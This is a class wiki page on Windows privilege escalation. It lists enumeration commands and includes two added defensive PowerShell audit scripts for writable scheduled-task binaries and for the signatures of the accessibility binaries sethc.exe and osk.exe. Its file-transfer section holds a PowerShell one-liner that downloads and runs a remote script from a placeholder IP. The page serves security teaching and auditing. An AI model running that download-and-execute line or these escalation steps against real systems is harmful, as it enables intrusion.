Class 7 Windows Privilege Escalation - cloudsecuritylabs/ethicalhackingclass GitHub Wiki
Class 7 - Windows privilege escalation
START HERE:
Windows System Enumeration
System Information
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Windows Architecture
wmic
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
Listing the Disk Drives
wmic logicaldisk get caption || fsutil fsinfo drives
Installed Patches
wmic qfe get Caption,Description,HotFixID,InstalledOn
WHOAMI
whoami
List Users and Groups
net user
net user admin [target admin users]
net localgroup
net localgroup IIS_IUSRS
net group /domain [if connected to a domain controller]
net group /domain "Domain Admins"
Networking Information
ipconfig /all
route print
netstat -ano
netsh firewall show state
net share
Showing Weak Permissions
icacls Shared
(F) : Full access
(M) : Modify access
(W) : Write-only access
Access on folders
accesschk.exe /accepteula -uwqs Users c:\*.*
Listing Installed Programs
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Listing Tasks and Processes
tasklist /v /fi "username eq system"
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
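The icacls / accesschk checks under "Showing Weak Permissions" and the scheduled-task listing above are usually run by hand. The script below is an added example (not part of the class wiki) that combines them: it walks every non-Microsoft scheduled task, resolves the executable each action runs, and reports any binary that a low-privilege principal can write to. A task running as SYSTEM whose binary is writable by BUILTIN\Users is exactly the misconfiguration an attacker looks for, so an administrator should fix the ACL on anything this reports. It assumes Windows 8 / Server 2012 or later (the ScheduledTasks module) and the list of "low-privilege" principals is a constructed choice you can extend.

```powershell
# Added example, not from the class wiki: audit the executables behind
# non-Microsoft scheduled tasks for write access by low-privilege principals.
# Assumes the ScheduledTasks module (Windows 8 / Server 2012 or later).

# Principals whose write access to a binary run by another account is a finding (constructed list).
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal replace or alter the file contents.
$WriteRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions

function Get-WritableByLowPriv {
    param([string]$Path)
    # Returns the low-privilege identities holding write-capable Allow ACEs on $Path.
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    $acl.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ([int]($_.FileSystemRights -band $WriteRights)) -ne 0 -and
            $LowPrivPrincipals -contains $_.IdentityReference.Value
        } |
        ForEach-Object { $_.IdentityReference.Value } |
        Sort-Object -Unique
}

function Resolve-TaskExecutable {
    param([string]$Execute)
    # Task actions may quote the path or use environment variables: strip quotes, expand variables.
    $exe = [Environment]::ExpandEnvironmentVariables($Execute.Trim('"'))
    if (-not [System.IO.Path]::IsPathRooted($exe)) {
        # Unqualified names such as "cmd.exe" resolve through PATH.
        $cmd = Get-Command $exe -ErrorAction SilentlyContinue
        if ($cmd) { $exe = $cmd.Source }
    }
    return $exe
}

$findings = Get-ScheduledTask |
    Where-Object { $_.TaskPath -notlike '\Microsoft*' } |
    ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe = Resolve-TaskExecutable $action.Execute
            if (-not (Test-Path -LiteralPath $exe)) { continue }
            $writers = Get-WritableByLowPriv $exe
            if ($writers) {
                [PSCustomObject]@{
                    TaskName   = $task.TaskName
                    TaskPath   = $task.TaskPath
                    RunAs      = $task.Principal.UserId
                    Executable = $exe
                    WritableBy = ($writers -join ', ')
                }
            }
        }
    }

if ($findings) {
    $findings | Format-Table -AutoSize
} else {
    Write-Output 'No non-Microsoft scheduled task binaries are writable by low-privilege principals.'
}
```

Run it from an elevated PowerShell prompt so Get-Acl can read every task binary; any row whose RunAs is SYSTEM or an administrator and whose WritableBy lists Users or Everyone should be remediated by removing the write ACE (icacls `/remove:g`) or moving the binary into a protected directory.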
File Transfers
- Exploit SAMBA - copy \\[SMB IP Address]\[SMB Folder Name]\[File To Transfer]
- Exploit FTP - >ftp open [FTP Server IP Address]
- Use powershell - >powershell "IEX(New-Object Net.WebClient).downloadString('http://[IP Address]/[file name]')"
Windows System Exploitation
- get access to an admin shell
- In Windows you can get a SYSTEM account
User Accounts
- for users, admins
Service Accounts / System Accounts
- High privilege accounts usually created by OS
Groups
- collection of user accounts
Resources
- files, folders, service
ACL
- who has access to what
sethc.exe
https://www.processlibrary.com/en/directory/files/sethc/28697/
- sethc.exe is a process associated with Windows NT High Contrast Invocation and is part of the Windows OS. With default Windows settings, this process is run when the Shift key is pressed 5 times in sequence, to invoke the StickyKeys configuration window.
bcdedit
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit BCDEdit is the primary tool for editing the boot configuration of Windows Vista and later versions of Windows. It is included with the Windows Vista distribution in the %WINDIR%\System32 folder. Administrative privileges are required to use BCDEdit to modify BCD.
OSK.EXE
- https://support.microsoft.com/en-us/windows/use-the-on-screen-keyboard-osk-to-type-ecbb5e08-5b4e-d8c8-f794-81dbf896267a
- Use the On-Screen Keyboard (OSK) to type
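sethc.exe and osk.exe are listed here because both can be launched from the logon screen, which is why a defender wants to know they are still the signed Microsoft originals. The script below is an added example (not part of the class wiki) that checks the Authenticode signature of each file in %WINDIR%\System32 and flags any that is unsigned, tampered, or signed by someone other than Microsoft. It assumes Windows 8 / Server 2012 or later, where Get-AuthenticodeSignature validates catalog-signed system binaries.

```powershell
# Added example, not from the class wiki: verify that the accessibility
# binaries named on this page are the validly signed Microsoft originals.
# Assumes Windows 8 / Server 2012 or later (catalog signature validation).

function Test-AccessibilityBinary {
    param([string]$Name)
    $path = Join-Path $env:WINDIR "System32\$Name"
    $sig  = Get-AuthenticodeSignature -FilePath $path
    $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<unsigned>' }
    [PSCustomObject]@{
        File      = $path
        Status    = $sig.Status                     # Valid, NotSigned, HashMismatch, ...
        Signer    = $signer
        # Genuine Windows binaries carry a "CN=Microsoft Windows" signer subject.
        Trusted   = ($sig.Status -eq 'Valid' -and $signer -like '*Microsoft Windows*')
        SizeBytes = (Get-Item -LiteralPath $path).Length
        Modified  = (Get-Item -LiteralPath $path).LastWriteTime
    }
}

# Only the binaries the page mentions; add others the same way.
$results = 'sethc.exe', 'osk.exe' | ForEach-Object { Test-AccessibilityBinary $_ }
$results | Format-Table -AutoSize

if ($results | Where-Object { -not $_.Trusted }) {
    Write-Warning 'One or more accessibility binaries are not validly signed by Microsoft; investigate the file before trusting the logon screen.'
}
```

A Status of HashMismatch or NotSigned on either file, or a recent Modified timestamp that does not line up with a Windows update, is the indicator to act on; compare the file against a known-good copy from installation media and review who had write access to System32 (the icacls / accesschk checks earlier on this page) or physical access to the machine.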